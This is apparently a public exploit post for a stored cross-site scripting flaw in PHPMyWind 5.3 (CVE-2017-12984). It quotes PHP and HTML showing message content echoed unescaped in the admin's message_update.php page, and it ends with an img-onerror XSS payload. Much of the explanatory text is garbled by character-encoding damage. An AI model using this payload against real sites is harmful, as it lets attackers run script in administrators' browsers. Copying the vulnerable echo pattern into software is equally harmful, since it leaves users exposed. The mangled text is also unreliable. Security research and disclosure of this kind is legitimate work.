PHPMyWind 5.3 Cross Site Scripting

`Exploit Titlei1/4PHPMyWind 5.3 has XSS  
Exploit Author:adege"  
Vendor Homepage:http://phpmywind.com  
Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip  
Version:5.3  
CVE:CVE-2017-12984  
  
  
$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`");  
$orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1));  
$nickname= htmlspecialchars($nickname);//ae,,a(r)C/(xxx)  
$contact= htmlspecialchars($contact); //ec3>>ae1a1/4  
$content= htmlspecialchars($content); //ce"aa(r)1  
  
$posttime= GetMkTime(time());  
$ip= gethostbyname($_SERVER['REMOTE_ADDR']);  
  
  
$sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')";  
if($dosql->ExecNoneQuery($sql))  
{  
ShowMsg('ce"aeai1/4aeedegC/ae"cae-aei1/4','message.php');  
exit();  
}  
}  
a-a>>Y=caoa1/2?c"htmlspecialcharse?e!e?ae>>$?,a,|aY=aoa,.  
e*e?contentaaedega  
127.0.0.1/PHPMyWind_5.3/admin/ message_update.php  
<?php require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('message'); ?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>a?(r)ae1ce"</title>  
<link href="templates/style/admin.css" rel="stylesheet" type="text/css" />  
<script type="text/javascript" src="templates/js/jquery.min.js"></script>  
<script type="text/javascript" src="templates/js/checkf.func.js"></script>  
<script type="text/javascript" src="editor/kindeditor-min.js"></script>  
<script type="text/javascript" src="editor/lang/zh_CN.js"></script>  
</head>  
<body>  
<?php  
$row = $dosql->GetOne("SELECT * FROM `#@__message` WHERE `id`=$id");  
?>  
<div class="formHeader"> <span class="title">a?(r)ae1ce"</span> <a href="javascript:location.reload();" class="reload">a*aedeg</a> </div>  
<form name="form" id="form" method="post" action="message_save.php">  
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="formTable">  
<tr>  
<td width="25%" height="40" align="right">c"ae*ai1/4</td>  
<td width="75%"><strong><?php echo $row['nickname'] ?></strong></td>  
</tr>  
<tr>  
<td height="40" align="right">ec3>>ae1a1/4i1/4</td>  
<td><input type="text" name="contact" id="contact" class="input" value="<?php echo $row['contact'] ?>" /></td>  
</tr>  
<tr>  
<td height="198" align="right">ce"aa(r)1i1/4</td>  
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>  
<script>  
  
  
p:33  
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>  
  
aadegc'aeY=aaocontentaaedeg,aedegae(r)a1Paeae?e!e1/2!a1aea1/2a  
  
  
EXP: a><img/src=x onerror=alert(2001)><aa  
  
`